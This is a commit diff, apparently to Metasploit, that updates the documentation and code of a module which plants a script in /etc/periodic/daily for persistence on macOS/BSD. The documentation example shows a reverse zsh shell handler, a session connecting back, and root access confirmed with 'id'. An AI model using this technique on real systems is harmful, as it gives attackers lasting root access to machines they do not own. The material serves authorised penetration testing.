Update docs

Author: msutovsky-r7

documentation/modules/exploit/multi/local/periodic_script_persistence.md

@@ -26,36 +26,37 @@ Periodic Directory to write script eg. /etc/periodic/daily
 
 Name of periodic script
 
-### PAYLOAD_DIR
 
-Directory to write payload to
-
-### PAYLOAD_FILENAME
-
-Name of the payload file
 
 ## Scenarios
 ```
-msf6 exploit(multi/handler) > use exploit/osx/local/periodic_script_persistence 
-[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
-msf6 exploit(osx/local/periodic_script_persistence) > set target 2
-target => 2
-msf6 exploit(osx/local/periodic_script_persistence) > set session 1
+msf6 exploit(multi/local/periodic_script_persistence) > set session 1
 session => 1
-msf6 exploit(osx/local/periodic_script_persistence) > set lport 6666
-lport => 6666
-msf6 exploit(osx/local/periodic_script_persistence) > set payload osx/aarch64/meterpreter_reverse_tcp
-payload => osx/aarch64/meterpreter_reverse_tcp
-msf6 exploit(osx/local/periodic_script_persistence) > run
+msf6 exploit(multi/local/periodic_script_persistence) > run verbose=true 
 
-[*] Started reverse TCP handler on 192.168.0.239:6666 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] /etc/periodic is writable
-[+] The target is vulnerable.
-[+] Writing payload to /tmp/q0Y1M6djZ suceeded
-[*] Succesfully wrote periodic script to /etc/periodic/daily/JPk5z2s. This will execute /tmp/q0Y1M6djZ
-Cleanup script:
-
-sudo rm /tmp/q0Y1M6djZ /etc/periodic/daily/JPk5z2s
-
-```
+[+] The target is vulnerable. /etc/periodic/daily/ is writable
+[*] Writing '/etc/periodic/daily/jX3dG9' (118 bytes) ...
+[*] Succesfully wrote periodic script to /etc/periodic/daily/jX3dG9.
+[*] Cleanup command 'sudo rm/etc/periodic/daily/jX3dG9'
+msf6 exploit(multi/local/periodic_script_persistence) > handler -p cmd/unix/reverse_zsh -P 4444 -H ens39
+[*] Payload handler running as background job 4.
+
+msf6 exploit(multi/local/periodic_script_persistence) > [*] Started reverse TCP handler on 192.168.168.219:4444 
+[*] Command shell session 6 opened (192.168.168.219:4444 -> 192.168.168.175:49190) at 2025-08-29 17:49:54 +0200
+msf6 exploit(multi/local/periodic_script_persistence) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                 Information           Connection
+  --  ----  ----                 -----------           ----------
+  1         meterpreter x64/osx  root @ mss-Mac.local  192.168.168.219:4242 -> 192.168.168.175:49165 (192.168.168.175)
+  6         shell cmd/unix                             192.168.168.219:4444 -> 192.168.168.175:49190 (192.168.168.175)
+
+msf6 exploit(multi/local/periodic_script_persistence) > sessions 6
+[*] Starting interaction with 6...
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),61(localaccounts),80(admin),701(com.apple.sharepoint.group.1),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)
+```

modules/exploits/multi/local/periodic_script_persistence.rb

@@ -40,6 +40,9 @@ def initialize(info = {})
           [ 'Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ],
           [ 'Bsd', { 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'bsd' }]
         ],
+        'DefaultOptions' => {
+          'DisablePayloadHandler' => true
+        },
         'DefaultTarget' => 4,
         'SessionTypes' => [ 'shell', 'meterpreter' ],
         'Notes' => {
@@ -78,7 +81,7 @@ def write_periodic_script(payload_content)
   end
 
   def exploit
-    @clean_up_rc = 'sudo '
+    @clean_up_rc = 'sudo rm'
 
     if target['Arch'] == ARCH_PYTHON
       print_status 'Getting python version & path.'